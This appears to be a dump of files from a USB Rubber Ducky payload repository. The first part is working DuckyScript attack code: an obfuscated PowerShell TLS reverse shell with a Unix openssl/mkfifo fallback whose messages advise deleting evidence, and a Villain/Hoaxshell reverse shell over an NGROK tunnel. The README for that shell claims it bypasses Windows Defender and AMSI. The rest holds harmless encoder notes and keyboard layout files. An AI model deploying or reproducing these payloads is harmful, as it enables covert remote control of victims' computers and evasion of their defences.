$var_gibberish\r\n INJECT_VAR $var_gibberish2\r\n INJECT_VAR $var_gibberish3\r\n INJECT_VAR $var_gibberish\r\n INJECT_VAR $var_gibberish4\r\n END_IF\r\n END_FUNCTION\r\n \r\n REM Polymorphism function\r\n FUNCTION Polymorphism2()\r\n IF (($RANDOM_LAYER % 6) == 0) THEN\r\n STRING $\r\n INJECT_VAR $var_gibberish\r\n INJECT_VAR $var_gibberish2\r\n INJECT_VAR $var_gibberish3\r\n INJECT_VAR $var_gibberish3\r\n INJECT_VAR $var_gibberish4\r\n INJECT_VAR $var_gIbberish5\r\n INJECT_VAR $var_gIbberish5\r\n ELSE IF (($RANDOM_LAYER % 9) == 0) THEN\r\n STRING $\r\n INJECT_VAR $var_gibberish\r\n INJECT_VAR $var_gIbberish5\r\n INJECT_VAR $var_gibberish2\r\n INJECT_VAR $var_gibberish\r\n INJECT_VAR $var_gibberish3\r\n INJECT_VAR $var_gibberish4\r\n INJECT_VAR $var_gibberish\r\n ELSE\r\n STRING $\r\n INJECT_VAR $var_gibberish4\r\n INJECT_VAR $var_gibberish\r\n INJECT_VAR $var_gibberish2\r\n INJECT_VAR $var_gibberish3\r\n INJECT_VAR $var_gibberish6\r\n INJECT_VAR $var_gibberish4\r\n INJECT_VAR $var_gIbberish5\r\n END_IF\r\n END_FUNCTION\r\n \r\n REM Polymorphism function\r\n FUNCTION Polymorphism3()\r\n IF (($RANDOM_LAYER % 1) == 0) THEN\r\n STRING $\r\n INJECT_VAR $var_gibberish\r\n INJECT_VAR $var_gibberish2\r\n INJECT_VAR $var_gIbberish5\r\n ELSE IF (($RANDOM_LAYER % 8) == 0) THEN\r\n STRING $\r\n INJECT_VAR $var_gibberish\r\n INJECT_VAR $var_gIbberish5\r\n INJECT_VAR $var_gibberish\r\n ELSE\r\n STRING $\r\n INJECT_VAR $var_gibberish4\r\n INJECT_VAR $var_gibberish\r\n INJECT_VAR $var_gIbberish5\r\n END_IF\r\n END_FUNCTION\r\n \r\n REM Polymorphism function\r\n FUNCTION Polymorphism4()\r\n IF (($RANDOM_LAYER % 1) == 0) THEN\r\n STRING $\r\n INJECT_VAR $var_gIbberish5\r\n INJECT_VAR $var_gibberish\r\n INJECT_VAR $var_gibberish2\r\n INJECT_VAR $var_gibb3rish\r\n ELSE IF (($RANDOM_LAYER % 8) == 0) THEN\r\n STRING $\r\n INJECT_VAR $var_gibBerish1\r\n INJECT_VAR $var_gibberish\r\n INJECT_VAR $var_gIbberish5\r\n INJECT_VAR $var_gibberish\r\n ELSE\r\n STRING $\r\n INJECT_VAR $var_gibberish6\r\n INJECT_VAR $var_gibberish4\r\n INJECT_VAR $var_gibberish\r\n INJECT_VAR $var_gIbberish5\r\n END_IF\r\n END_FUNCTION\r\n \r\n REM Connection Message\r\n FUNCTION Quack_Slogan()\r\n IF (($RANDOM_LAYER % 2) == 0) THEN\r\n STRING \"[!] Quack you $env:USERNAME/$env:COMPUTERNAME! `n[?] Opsec Tip: Use environment variables.`n`n\"\r\n ELSE IF (($RANDOM_LAYER % 3) == 0) THEN\r\n STRING \"[!] $env:USERNAME/$env:COMPUTERNAME got found a flash drive... `n[?] Considere converting IPs to decimal (e.g. 127.0.0.1 = 2130706433)`n`n\"\r\n ELSE IF (($RANDOM_LAYER % 4) == 0) THEN\r\n STRING \"[!] $env:USERNAME/$env:COMPUTERNAME compromised by #IDENTIFIER `n[+] Ducks > D0lphins!`n`n\"\r\n ELSE IF (($RANDOM_LAYER % 6) == 0) THEN\r\n STRING \"[!] Quack Attack on $env:USERNAME/$env:COMPUTERNAME `n[+] Sometimes it is better to wait...Be patient!`n`n\"\r\n ELSE IF (($RANDOM_LAYER % 8) == 0) THEN\r\n STRING \"[!] Established remote access on $env:USERNAME/$env:COMPUTERNAME `n[?] Watch out for powershell -v 2!`n`n\"\r\n ELSE IF (($RANDOM_LAYER % 9) == 0) THEN\r\n STRING \"[!] $env:USERNAME/$env:COMPUTERNAME messed with the Duck `n[?] Remember to delete evidence.`n`n\"\r\n ELSE\r\n STRING \"[!] $env:USERNAME/$env:COMPUTERNAME says Quack! `n[+]...and then he waddled away...`n`n\"\r\n END_IF\r\n END_FUNCTION\r\n \r\n REM Downgrades the Console, if Windows 11 is set to TRUE\r\n IF_DEFINED_TRUE #WINDOWS11\r\n Console_Downgrade()\r\n DELAY 2000\r\n END_IF_DEFINED\r\n GUI r\r\n DELAY 500\r\n Rolling_Powershell_Execution()\r\n DELAY 1000\r\n Polymorphism() \r\n STRING =[Text.Encoding]::UTF8.GetBytes(\r\n Quack_Slogan()\r\n STRING );\r\n Polymorphism2()\r\n REM Section were Address & Port get reflected\r\n STRING =New-Object Net.Sockets.TcpClient( #ADDRESS , #PORT );\r\n STRING $s=\r\n Polymorphism2()\r\n STRING .GetStream();\r\n STRING $sSL=New-Object System.Net.Security.SslStream($s,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]));\r\n STRING $sSL.AuthenticateAsClient('madeby.0i41E', $null, \"Tls12\", $false);\r\n Polymorphism3()\r\n STRING =new-object System.IO.StreamWriter($sSL);\r\n STRING $sSL.write(\r\n Polymorphism()\r\n STRING ,0,\r\n Polymorphism()\r\n STRING .Length);\r\n Polymorphism3()\r\n STRING .Write('\r\n REM Identifier\r\n STRING #IDENTIFIER\r\n STRING @PS '+(&('g'+'l'))+'> ');\r\n Polymorphism3()\r\n STRING .flush();[byte[]]\r\n Polymorphism4() \r\n STRING = 0..65535|%{0};while(($i=$sSL.Read(\r\n Polymorphism4()\r\n STRING , 0, \r\n Polymorphism4()\r\n STRING .Length)) -ne 0){$D=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\r\n Polymorphism4()\r\n STRING ,0, $i);\r\n STRING $Y=(iex $D | Out-String ) 2>&1;$X=$Y + '\r\n REM Identifier\r\n STRING #IDENTIFIER\r\n STRING @PS ' + (Get-LoCatIon).Path + '> ';\r\n STRING $Z=([text.encoding]::UTF8).GetBytes($X);$sSL.Write($Z,0,$Z.Length);\r\n STRING $sSL.Flush()};exit\r\n DELAY 250\r\n ENTER\r\n REM Indicator of successful execution\r\n Detect_Finished()\r\n ELSE\r\n REM Executing reverse shell when inserted into non-windows box\r\n REM Non-ideal solution for opening terminal (But should work for most unix distros)\r\n DELAY 2000\r\n INJECT_MOD COMMAND\r\n DELAY 2000\r\n STRING terminal\r\n DELAY 500\r\n ENTER\r\n DELAY 1000\r\n STRINGLN which screen >/dev/null && which openssl >/dev/null && screen -md sh -c 'mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect #ADDRESS:#PORT > /tmp/s; rm /tmp/s'\r\n DELAY 1000\r\n STRINGLN exit\r\n REM Indicator of successful execution\r\n Detect_Finished()\r\n END_IF\r\nEND_IF_DEFINED\r\n" }, { "path": "payloads/library/remote_access/VillainShellviaNGROKTunnel/README.MD", "content": "**Title: Hoaxshell via Villain Payload and NGROK Tunnel**\r\n\r\n

Author: HackingMark
\r\nOS: Windows
\r\nVersion: 1.0
\r\nRequirements: DuckyScript 3.0, powershell, Linux Maschine with Villain, NGROK

\r\n\r\n**What is Villain?**\r\n#\r\n*Villain is a Toolset to setup Payloads and Listener for Hoaxshell*\r\n*Hoaxshell is actually undetected by Windows Defender and the Payload is optimized to bypass AMSITrigger*\r\n*The Powershell Payload connects the target Machine back to the Hoaxshell Server, NGROK makes this Server reachable from the Internet. *\r\n*That way you can catch your session from everywhere. Once your session is established, you can open an interactive shell.*\r\n\r\n\r\n\r\n**How to use this Payload**\r\n\r\nFirst clone Villain from Repo:\r\n`git clone https://github.com/t3l3machus/Villain`\r\nThen install Requirements:\r\n`cd Villain`\r\n`pip install -r ./requirements.txt`\r\nAllow Villain to start:\r\n`chmod +x ./Villain.py`\r\nFire it up:\r\n`./Villain.py`\r\nGenerate a payload to get the session identifier:\r\n`generate os=windows lhost=0.0.0.0 lport=8080`\r\n![alt text](https://github.com/HackingMark/usbrubberducky-payloads/blob/master/payloads/library/remote_access/VillainShellviaNGROKTunnel/media/villain.png)\r\n\r\nEstablish NGROK Tunnel forwarding Traffic to our Hoaxshell Engine\r\n`ngrok http 8080`\r\n![alt text](https://github.com/HackingMark/usbrubberducky-payloads/blob/master/payloads/library/remote_access/VillainShellviaNGROKTunnel/media/ngrok1.png)\r\nLeave this Window open\r\n![alt text](https://github.com/HackingMark/usbrubberducky-payloads/blob/master/payloads/library/remote_access/VillainShellviaNGROKTunnel/media/ngrok2.png)\r\n\r\n**Preparing the Payload:**\r\nYou need 2 Values from above: NGROK HTTPS Link and Session Identifier from Villain\r\nPut it into the Payload then compile it to inject.bin and download.\r\n![alt text](https://github.com/HackingMark/usbrubberducky-payloads/blob/master/payloads/library/remote_access/VillainShellviaNGROKTunnel/media/payloadstudio.png)\r\n\r\nCopy your Inject.bin to your Ducky!\r\n\r\n

Plug your Ducky into a Windows target.
\r\nAchieve reverse shell.
\r\n open a shell with

\r\n `shell SESSION-ID`\r\n" }, { "path": "payloads/library/remote_access/VillainShellviaNGROKTunnel/payload.txt", "content": "REM Villain Shell via NGROK\nREM HackingMark\nREM DESCRIPTION This Script spawns a Admin Powershellwindow and executes the Villain Payload throug an NGROK Tunnel in the Background(Win10)/minimized(Win11)\n\nREM Villain Hoaxshell by T3l3machus on Github: https://github.com/t3l3machus/Villain \nREM What to do before: Start Villain.py on your System and create a Payload (generate os=windows lhost=0.0.0.0 lport=8080) to get the $i value\nREM take the generated Value from $i and paste it in line 11-13\nREM Start Ngrok Tunnel (ngrok http 8080)\nREM Put your NGROK HTTPS Link here\nDEFINE #NGROK Example.com\nREM Split your Sessionnumber into 3 parts eg $i='4ba4f358-322d5df5-f4516c91'\nDEFINE #SN1 4ba4f358\nDEFINE #SN2 322d5df5\nDEFINE #SN3 f4516c91\n\n\nDELAY 2000\nGUI x\nDELAY 200\nSTRING a\nDELAY 500\nALT j\nREM The Part above needs to be adapted to your language, code is for German System Layouts\nDELAY 1000\nSTRING powershell -w h -NoP -NonI -ep Bypass -C {$s='\nSTRING #NGROK\nSTRING ';$i='\nSTRING #SN1\nSTRING -\nSTRING #SN2\nSTRING -\nSTRING #SN3\nSTRING ';$p='h'+'ttps://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/\nSTRING #SN1\nSTRING /$env:COMPUTERNAME/$env:USERNAME -Headers @{\"Authorization\"=$i;\"ngrok-skip-browser-warning\"=\"asd\"};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/\nSTRING #SN2\nSPACE\nSTRING -Headers @{\"Authorization\"=$i;\"ngrok-skip-browser-warning\"=\"asd\"});if ($c -ne 'None') {$r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/\nSTRING #SN3\nSPACE\nSTRING -Method POST -Headers @{\"Authorization\"=$i;\"ngrok-skip-browser-warning\"=\"asd\"} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}}\nENTER\n" }, { "path": "payloads/library/remote_access/duckNet/Encoder/.classpath", "content": "\n\n\t\n\t\n\t\n\n" }, { "path": "payloads/library/remote_access/duckNet/Encoder/.project", "content": "\n\n\tHak5_Duck_Encoder\n\t\n\t\n\t\n\t\n\t\t\n\t\t\torg.eclipse.jdt.core.javabuilder\n\t\t\t\n\t\t\t\n\t\t\n\t\n\t\n\t\torg.eclipse.jdt.core.javanature\n\t\n\n" }, { "path": "payloads/library/remote_access/duckNet/Encoder/.settings/org.eclipse.jdt.core.prefs", "content": "#Sun Aug 07 16:02:51 PDT 2011\neclipse.preferences.version=1\norg.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled\norg.eclipse.jdt.core.compiler.codegen.targetPlatform=1.6\norg.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve\norg.eclipse.jdt.core.compiler.compliance=1.6\norg.eclipse.jdt.core.compiler.debug.lineNumber=generate\norg.eclipse.jdt.core.compiler.debug.localVariable=generate\norg.eclipse.jdt.core.compiler.debug.sourceFile=generate\norg.eclipse.jdt.core.compiler.problem.assertIdentifier=error\norg.eclipse.jdt.core.compiler.problem.enumIdentifier=error\norg.eclipse.jdt.core.compiler.source=1.6\n" }, { "path": "payloads/library/remote_access/duckNet/Encoder/README", "content": "This new version allows you to use alternative layout. It supports ASCII, ISO-8859-1 and unicode.\n\n$java -jar duckencode.jar -i script.txt -o inject.bin -l fr\nor\n$java -jar duckencode.jar -i script.txt -o inject.bin -l resources/mylayout.properties\n\n----------\n\nHak5 Duck Encoder 2.6.3\n\nusage: duckencode -i [file ..] encode specified file\n or: duckencode -i [file ..] -o [file ..] encode to specified file\n\nArguments:\n -i [file ..] Input File\n -o [file ..] Output File\n -l [file ..] Keyboard Layout (us/uk/fr/pt or a path to a properties file)\n\nScript Commands:\n ALT [key name] (ex: ALT F4, ALT SPACE)\n ALT-SHIFT (Input Lanugage Swap)\n CTRL | CONTROL [key name] (ex: CTRL ESC)\n CTRL-ALT [key name] (ex: CTRL-ALT DEL)\n CTRL-SHIFT [key name] (ex: CTRL-SHIFT ESC)\n DEFAULT_DELAY | DEFAULTDELAY [Time in millisecond * 10] (change the delay between each command)\n DELAY [Time in millisecond * 10] (used to overide temporary the default delay)\n COMMAND | COMMAND [key] (For OSX Users ex: COMMAND SPACE)\n GUI | WINDOWS [key name] (ex: GUI r, GUI l)\n REM [anything] (used to comment your code, no obligation :) )\n SHIFT [key name] (ex: SHIFT DEL)\n REPEAT [Number] (Repeat last command N times)\n STRING [any character of your layout]\n [key name] (anything in the keyboard.properties)\n\nNote:\n Getting strange behaviour with GUI to open windows-menu, WINDOWS appears to work ok (but GUI maps to WINDOWS), strange?\n" }, { "path": "payloads/library/remote_access/duckNet/Encoder/resources/be.properties", "content": "#ifdef LAYOUT_FRENCH_BELGIAN\n\nKEY_NON_US_100 = 100\n\nASCII_20 = KEY_SPACE\n// 32 \nASCII_21 = KEY_8\n// 33 !\nASCII_22 = KEY_3\n// 34 \"\nASCII_23 = KEY_3, MODIFIERKEY_RIGHT_ALT\n// 35 #\nASCII_24 = KEY_RIGHT_BRACE\n// 36 $\nASCII_25 = KEY_QUOTE, MODIFIERKEY_SHIFT\n// 37 %\nASCII_26 = KEY_1\n// 38 &\nASCII_27 = KEY_4\n// 39 ' \nASCII_28 = KEY_5\n// 40 ( \nASCII_29 = KEY_MINUS\n// 41 )\nASCII_2A = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT\n// 42 *\nASCII_2B = KEY_SLASH, MODIFIERKEY_SHIFT\n// 43 +\nASCII_2C = KEY_M\n// 44 ,\nASCII_2D = KEY_EQUAL\n// 45 -\nASCII_2E = KEY_COMMA, MODIFIERKEY_SHIFT\n// 46 .\nASCII_2F = KEY_PERIOD, MODIFIERKEY_SHIFT\n// 47 /\nASCII_30 = KEY_0, MODIFIERKEY_SHIFT\n// 48 0\nASCII_31 = KEY_1, MODIFIERKEY_SHIFT\n// 49 1\nASCII_32 = KEY_2, MODIFIERKEY_SHIFT\n// 50 2\nASCII_33 = KEY_3, MODIFIERKEY_SHIFT\n// 51 3\nASCII_34 = KEY_4, MODIFIERKEY_SHIFT\n// 52 4\nASCII_35 = KEY_5, MODIFIERKEY_SHIFT\n// 53 5\nASCII_36 = KEY_6, MODIFIERKEY_SHIFT\n// 54 6\nASCII_37 = KEY_7, MODIFIERKEY_SHIFT\n// 55 7\nASCII_38 = KEY_8, MODIFIERKEY_SHIFT\n// 55 8\nASCII_39 = KEY_9, MODIFIERKEY_SHIFT\n// 57 9\nASCII_3A = KEY_PERIOD\n// 58 :\nASCII_3B = KEY_COMMA\n// 59 ;\nASCII_3C = KEY_NON_US_100\n// 60 <\nASCII_3D = KEY_SLASH\n// 61 =\nASCII_3E = KEY_NON_US_100, MODIFIERKEY_SHIFT\n// 62 >\nASCII_3F = KEY_M, MODIFIERKEY_SHIFT\n// 63 ?\nASCII_40 = KEY_2, MODIFIERKEY_RIGHT_ALT\n// 64 @\nASCII_41 = KEY_Q, MODIFIERKEY_SHIFT\n// 65 A\nASCII_42 = KEY_B, MODIFIERKEY_SHIFT\n// 66 B\nASCII_43 = KEY_C, MODIFIERKEY_SHIFT\n// 67 C\nASCII_44 = KEY_D, MODIFIERKEY_SHIFT\n// 68 D\nASCII_45 = KEY_E, MODIFIERKEY_SHIFT\n// 69 E\nASCII_46 = KEY_F, MODIFIERKEY_SHIFT\n// 70 F\nASCII_47 = KEY_G, MODIFIERKEY_SHIFT\n// 71 G\nASCII_48 = KEY_H, MODIFIERKEY_SHIFT\n// 72 H\nASCII_49 = KEY_I, MODIFIERKEY_SHIFT\n// 73 I\nASCII_4A = KEY_J, MODIFIERKEY_SHIFT\n// 74 J\nASCII_4B = KEY_K, MODIFIERKEY_SHIFT\n// 75 K\nASCII_4C = KEY_L, MODIFIERKEY_SHIFT\n// 76 L\nASCII_4D = KEY_SEMICOLON, MODIFIERKEY_SHIFT\n// 77 M\nASCII_4E = KEY_N, MODIFIERKEY_SHIFT\n// 78 N\nASCII_4F = KEY_O, MODIFIERKEY_SHIFT\n// 79 O\nASCII_50 = KEY_P, MODIFIERKEY_SHIFT\n// 80 P\nASCII_51 = KEY_A, MODIFIERKEY_SHIFT\n// 81 Q\nASCII_52 = KEY_R, MODIFIERKEY_SHIFT\n// 82 R\nASCII_53 = KEY_S, MODIFIERKEY_SHIFT\n// 83 S\nASCII_54 = KEY_T, MODIFIERKEY_SHIFT\n// 84 T\nASCII_55 = KEY_U, MODIFIERKEY_SHIFT\n// 85 U\nASCII_56 = KEY_V, MODIFIERKEY_SHIFT\n// 86 V\nASCII_57 = KEY_Z, MODIFIERKEY_SHIFT\n// 87 W\nASCII_58 = KEY_X, MODIFIERKEY_SHIFT\n// 88 X\nASCII_59 = KEY_Y, MODIFIERKEY_SHIFT\n// 89 Y\nASCII_5A = KEY_W, MODIFIERKEY_SHIFT\n// 90 Z\nASCII_5B = KEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT\n// 91 [\nASCII_5C = KEY_NON_US_100, MODIFIERKEY_RIGHT_ALT\n// 92 \nASCII_5D = KEY_LEFT_BRACE, MODIFIERKEY_RIGHT_ALT\n// 93 ]\nASCII_5E = KEY_6, MODIFIERKEY_RIGHT_ALT\n// 94 ^\nASCII_5F = KEY_EQUAL, MODIFIERKEY_SHIFT\n// 95 _\nASCII_60 = KEY_BACKSLASH, MODIFIERKEY_RIGHT_ALT\n// 96 ` (not tested)\nASCII_61 = KEY_Q\n// 97 a\nASCII_62 = KEY_B\n// 98 b\nASCII_63 = KEY_C\n// 99 c\nASCII_64 = KEY_D\n// 100 d\nASCII_65 = KEY_E\n// 101 e\nASCII_66 = KEY_F\n// 102 f\nASCII_67 = KEY_G\n// 103 g\nASCII_68 = KEY_H\n// 104 h\nASCII_69 = KEY_I\n// 105 i\nASCII_6A = KEY_J\n// 106 j\nASCII_6B = KEY_K\n// 107 k\nASCII_6C = KEY_L\n// 108 l\nASCII_6D = KEY_SEMICOLON\n// 109 m\nASCII_6E = KEY_N\n// 110 n\nASCII_6F = KEY_O\n// 111 o\nASCII_70 = KEY_P\n// 112 p\nASCII_71 = KEY_A\n// 113 q\nASCII_72 = KEY_R\n// 114 r\nASCII_73 = KEY_S\n// 115 s\nASCII_74 = KEY_T\n// 116 t\nASCII_75 = KEY_U\n// 117 u\nASCII_76 = KEY_V\n// 118 v\nASCII_77 = KEY_Z\n// 119 w\nASCII_78 = KEY_X\n// 120 x\nASCII_79 = KEY_Y\n// 121 y\nASCII_7A = KEY_W\n// 122 z\nASCII_7B = KEY_9, MODIFIERKEY_RIGHT_ALT\n// 123 {\nASCII_7C = KEY_1, MODIFIERKEY_RIGHT_ALT\n// 124 |\nASCII_7D = KEY_0, MODIFIERKEY_RIGHT_ALT\n// 125 }\nASCII_7E = KEY_SLASH, MODIFIERKEY_RIGHT_ALT\n// 126 ~\nASCII_7F = KEY_BACKSPACE\n// 127\nISO_8859_1_A0 = KEY_SPACE\n// 160 Nonbreakng Space\nISO_8859_1_A3 = KEY_BACKSLASH, MODIFIERKEY_SHIFT\n// 163 £ Pound Sign\nISO_8859_1_A7 = KEY_6\n// 167 § SECTION SIGN\nISO_8859_1_B0 = KEY_MINUS, MODIFIERKEY_SHIFT\n// 176 ° DEGREE SIGN\nISO_8859_1_B2 = KEY_TILDE\n// 178 ² SUPERSCRIPT TWO\nISO_8859_1_B3 = KEY_TILDE, MODIFIERKEY_SHIFT\n// 179 ³ SUPERSCRIPT THREE\n//ISO_8859_1_B4 = ACUTE_ACCENT_BITS + KEY_SPACE\n// 180 ´ ACUTE ACCENT\nISO_8859_1_B5 = KEY_BACKSLASH\n// 181 µ MICRO SIGN\nISO_8859_1_E0 = KEY_0\n// 224 à a GRAVE\nISO_8859_1_E7 = KEY_9\n// 231 ç c CEDILLA\nISO_8859_1_E8 = KEY_7\n// 232 è e GRAVE\nISO_8859_1_E9 = KEY_2\n// 233 é e ACUTE\nISO_8859_1_F9 = KEY_QUOTE\n// 249 ù u GRAVE - TODO; check FRENCH\nUNICODE_20AC = KEY_E, MODIFIERKEY_RIGHT_ALT\n// € Euro Sign\n\n" }, { "path": "payloads/library/remote_access/duckNet/Encoder/resources/br.properties", "content": "//LAYOUT_PORTUGUESE (BRAZIL) - http://ascii-table.com/keyboard.php/275\n//Updated by TheZakMan / @thezakman / thezakman.tumblr.com (20/10/2014)\n\nKEY_NON_US_100 = 100\n\n// a b c d e f g h i j k l m n o p r s t u v z x y q ç\nASCII_20 = KEY_SPACE\nASCII_61 = KEY_A\nASCII_62 = KEY_B\nASCII_63 = KEY_C\nASCII_64 = KEY_D\nASCII_65 = KEY_E\nASCII_66 = KEY_F\nASCII_67 = KEY_G\nASCII_68 = KEY_H\nASCII_69 = KEY_I\nASCII_6A = KEY_J\nASCII_6B = KEY_K\nASCII_6C = KEY_L\nASCII_6D = KEY_M\nASCII_6E = KEY_N\nASCII_6F = KEY_O\nASCII_70 = KEY_P\nASCII_72 = KEY_R\nASCII_73 = KEY_S\nASCII_74 = KEY_T\nASCII_75 = KEY_U\nASCII_76 = KEY_V\nASCII_7A = KEY_Z\nASCII_78 = KEY_X\nASCII_77 = KEY_W\nASCII_79 = KEY_Y\nASCII_71 = KEY_Q\n//ç\nISO_8859_1_E7 = KEY_SEMICOLON\n\n// A B C D E F G H I J K L M N O P R S T U V Z X Y Q Ç\nASCII_41 = KEY_A, MODIFIERKEY_SHIFT\nASCII_42 = KEY_B, MODIFIERKEY_SHIFT\nASCII_43 = KEY_C, MODIFIERKEY_SHIFT\nASCII_44 = KEY_D, MODIFIERKEY_SHIFT\nASCII_45 = KEY_E, MODIFIERKEY_SHIFT\nASCII_46 = KEY_F, MODIFIERKEY_SHIFT\nASCII_47 = KEY_G, MODIFIERKEY_SHIFT\nASCII_48 = KEY_H, MODIFIERKEY_SHIFT\nASCII_49 = KEY_I, MODIFIERKEY_SHIFT\nASCII_4A = KEY_J, MODIFIERKEY_SHIFT\nASCII_4B = KEY_K, MODIFIERKEY_SHIFT\nASCII_4C = KEY_L, MODIFIERKEY_SHIFT\nASCII_4D = KEY_M, MODIFIERKEY_SHIFT\nASCII_4E = KEY_N, MODIFIERKEY_SHIFT\nASCII_4F = KEY_O, MODIFIERKEY_SHIFT\nASCII_50 = KEY_P, MODIFIERKEY_SHIFT\nASCII_52 = KEY_R, MODIFIERKEY_SHIFT\nASCII_53 = KEY_S, MODIFIERKEY_SHIFT\nASCII_54 = KEY_T, MODIFIERKEY_SHIFT\nASCII_55 = KEY_U, MODIFIERKEY_SHIFT\nASCII_56 = KEY_V, MODIFIERKEY_SHIFT\nASCII_5A = KEY_Z, MODIFIERKEY_SHIFT\nASCII_57 = KEY_W, MODIFIERKEY_SHIFT\nASCII_58 = KEY_X, MODIFIERKEY_SHIFT\nASCII_59 = KEY_Y, MODIFIERKEY_SHIFT\nASCII_51 = KEY_Q, MODIFIERKEY_SHIFT\n//Ç\n\nISO_8859_1_C7 = KEY_SEMICOLON, MODIFIERKEY_SHIFT\n// Simbolos // ' ! @ # $ % & * ( ) _ + \" - = / ? ° [ ] { } \\ , . ; < > :\nASCII_27 = KEY_TILDE\nASCII_21 = KEY_1, MODIFIERKEY_SHIFT\nASCII_40 = KEY_2, MODIFIERKEY_SHIFT\nASCII_23 = KEY_3, MODIFIERKEY_SHIFT\nASCII_24 = KEY_4, MODIFIERKEY_SHIFT\nASCII_25 = KEY_5, MODIFIERKEY_SHIFT\nASCII_26 = KEY_7, MODIFIERKEY_SHIFT\nASCII_2A = KEY_8, MODIFIERKEY_SHIFT\nASCII_28 = KEY_9, MODIFIERKEY_SHIFT\nASCII_29 = KEY_0, MODIFIERKEY_SHIFT\nASCII_5F = KEY_MINUS, MODIFIERKEY_SHIFT\nASCII_2B = KEY_EQUAL, MODIFIERKEY_SHIFT\nASCII_22 = KEY_TILDE, MODIFIERKEY_SHIFT\nASCII_2D = KEY_MINUS\nASCII_3D = KEY_EQUAL\nASCII_2F = KEY_Q, MODIFIERKEY_RIGHT_ALT\nASCII_3F = KEY_W, MODIFIERKEY_RIGHT_ALT\nISO_8859_1_B0 = KEY_E, MODIFIERKEY_RIGHT_ALT\nASCII_5B = KEY_RIGHT_BRACE\nASCII_5D = KEY_BACKSLASH\nASCII_7B = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT\nASCII_7D = KEY_BACKSLASH, MODIFIERKEY_SHIFT\nASCII_5C = KEY_NON_US_100\nASCII_2C = KEY_COMMA\nASCII_2E = KEY_PERIOD\nASCII_3B = KEY_SLASH\nASCII_3C = KEY_COMMA, MODIFIERKEY_SHIFT\nASCII_3E = KEY_PERIOD, MODIFIERKEY_SHIFT\nASCII_3A = KEY_SLASH, MODIFIERKEY_SHIFT\n\n\n\n\n\n\n// Other symbols // input: § ´ ~ | ^ ` output: § ´~| ^` (notice some space missing!)\n\n//ACENTOS (SPECIAL SYMBOLS)\nISO_8859_1_A7 = KEY_EQUAL, MODIFIERKEY_RIGHT_ALT\nISO_8859_1_B4 = KEY_LEFT_BRACE\nASCII_7E = KEY_QUOTE\nASCII_7C = KEY_NON_US_100, MODIFIERKEY_SHIFT\nASCII_5E = KEY_QUOTE, MODIFIERKEY_SHIFT\nASCII_60 = KEY_LEFT_BRACE, MODIFIERKEY_SHIFT\n\n\n// NUMEROS (NUMBERS)\n\t\t\t\n// 48 0\nASCII_30 = KEY_0\t\t\t\t\n// 49 1\nASCII_31 = KEY_1\t\t\t\t\n// 50 2\nASCII_32 = KEY_2\t\t\t\t\n// 51 3\nASCII_33 = KEY_3\t\t\t\t\n// 52 4\nASCII_34 = KEY_4\t\t\t\t\n// 53 5\nASCII_35 = KEY_5\t\t\t\t\n// 54 6\nASCII_36 = KEY_6\t\t\t\t\n// 55 7\nASCII_37 = KEY_7\t\t\t\t\n// 55 8\nASCII_38 = KEY_8\t\t\t\t\n// 57 9\nASCII_39 = KEY_9" }, { "path": "payloads/library/remote_access/duckNet/Encoder/resources/ca.properties", "content": "// Candian Keyboard Layout\r\n// CA layout by D4rk_F1r3 2013/12/2\r\n\r\n// 32 \r\nASCII_20 = KEY_SPACE\t\t\t\t\t\r\n // 33 !\r\nASCII_21 = KEY_1, MODIFIERKEY_SHIFT\t\t\t\t\t\r\n// 34 \"\r\nASCII_22 = KEY_2, MODIFIERKEY_SHIFT\t\t\t\t\t\r\n// 35 #\r\nASCII_23 = KEY_TILDE\t\t\t\r\n// 36 $\r\nASCII_24 = KEY_4, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 37 %\r\nASCII_25 = KEY_5, MODIFIERKEY_SHIFT\t\t\t\r\n// 38 &\r\nASCII_26 = KEY_7, MODIFIERKEY_SHIFT\t\t\t\t\t\r\n// 39 ' \r\nASCII_27 = KEY_COMMA, MODIFIERKEY_SHIFT\t\r\n// 40 ( \r\nASCII_28 = KEY_9, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 41 )\r\nASCII_29 = KEY_0, MODIFIERKEY_SHIFT\t\t\t\r\n// 42 *\r\nASCII_2A = KEY_8, MODIFIERKEY_SHIFT\t\t\t\r\n// 43 +\r\nASCII_2B = KEY_EQUAL, MODIFIERKEY_SHIFT\t\t\t\r\n// 44 ,\r\nASCII_2C = KEY_COMMA\t\t\t\r\n// 45 -\r\nASCII_2D = KEY_MINUS\t\t\t\t\r\n// 46 .\r\nASCII_2E = KEY_PERIOD\t\t\t\r\n// 47 /\r\nASCII_2F = KEY_3, MODIFIERKEY_SHIFT\t\t\t\r\n// 48 0\r\nASCII_30 = KEY_0\t\t\t\t\r\n// 49 1\r\nASCII_31 = KEY_1\t\t\t\t\r\n// 50 2\r\nASCII_32 = KEY_2\t\t\t\t\r\n// 51 3\r\nASCII_33 = KEY_3\t\t\t\t\r\n// 52 4\r\nASCII_34 = KEY_4\t\t\t\t\r\n// 53 5\r\nASCII_35 = KEY_5\t\t\t\t\r\n// 54 6\r\nASCII_36 = KEY_6\t\t\t\t\r\n// 55 7\r\nASCII_37 = KEY_7\t\t\t\t\r\n// 55 8\r\nASCII_38 = KEY_8\t\t\t\t\r\n// 57 9\r\nASCII_39 = KEY_9\t\t\t\t\r\n// 58 :\r\nASCII_3A = KEY_SEMICOLON, MODIFIERKEY_SHIFT\t\t\t\t\t\r\n// 59 ;\r\nASCII_3B = KEY_SEMICOLON\t\t\r\n// 60 <\r\nASCII_3C = KEY_BACKSLASH\t\t\t\r\n// 61 =\r\nASCII_3D = KEY_EQUAL\t\t\t\t\t\r\n// 62 >\r\nASCII_3E = KEY_BACKSLASH, MODIFIERKEY_SHIFT\t\t\t\r\n// 63 ?\r\nASCII_3F = KEY_6, 